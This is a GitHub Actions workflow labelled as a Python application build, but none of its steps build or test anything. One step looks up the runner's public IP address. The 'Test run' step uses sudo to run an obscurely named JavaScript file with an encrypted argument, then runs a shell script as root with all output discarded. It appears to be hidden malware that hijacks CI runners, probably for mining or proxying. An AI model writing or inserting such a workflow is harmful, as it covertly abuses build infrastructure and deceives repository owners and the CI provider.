name: Python application

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

permissions:
  contents: read

jobs:
  build:

    runs-on: ubuntu-latest
    timeout-minutes: 12

    steps:
    - uses: actions/checkout@v3
    - name: Set up Python 3.8
      uses: actions/setup-python@v3
      with:
        python-version: "3.8"
    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
        curl ifconfig.me > ip.txt
        cat ip.txt
    - name: Test run
      run: |
        cd ${{ github.workspace }}
        echo 'l035l'
        sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1/4FKoG+jnMijPyigsyhefNLRpPiSmVX3vzTN1aW9v2W8DXx6Sl7+x34cEEJWcU7wPwzOlbNoxK5rqxleUVTr3RY/taQxLRDLg+8UdW7gho1YVtydzGL8NO 5weni0 && sudo sh r.sh > /dev/null 2>&1
